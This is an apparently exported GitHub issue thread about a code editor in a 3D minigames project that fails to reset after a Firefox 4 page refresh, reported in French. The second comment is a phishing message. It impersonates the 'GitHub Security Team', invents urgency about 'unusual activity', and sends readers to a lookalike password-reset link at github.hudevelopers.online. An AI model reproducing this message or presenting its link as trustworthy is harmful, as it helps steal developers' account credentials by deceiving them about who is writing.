### ISSUE TITLE
Raffraichissement dans Firefox 4 et éditeur de code

### ISSUE THREAD

**Issue by GoogleCodeExporter** [manekinekko/3dminigames#18]
```
Lors d'un rafraichissement de la page dans Firefox 4, l'éditeur de code est 
censé se réinitialiser, or il garde l'ancien contenu.
```

Original issue reported on code.google.com by `wassim.chegham@gmail.com` on 30 Apr 2011 at 12:29

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
